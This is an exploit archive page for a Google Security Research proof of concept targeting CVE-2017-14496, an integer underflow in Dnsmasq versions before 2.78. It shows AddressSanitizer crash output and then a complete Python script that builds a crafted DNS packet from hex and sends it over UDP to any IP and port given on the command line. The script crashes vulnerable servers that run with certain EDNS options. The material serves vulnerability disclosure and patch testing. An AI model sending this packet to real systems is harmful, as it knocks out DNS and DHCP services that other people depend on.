exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dnsmasq Integer Underflow

Dnsmasq Integer Underflow
Posted Oct 2, 2017
Authored by Google Security Research

Dnsmasq versions prior to 2.78 suffer from an integer underflow vulnerability.

tags | exploit
advisories | CVE-2017-14496
SHA-256 | b30651e9f05e6690e614ee818b7dd9a9c45d82330c286167876931a6c623c955

Dnsmasq Integer Underflow

Change Mirror Download
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.

=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)

0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/

import socket
import sys

def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data

if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

packet = negative_size_param()

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close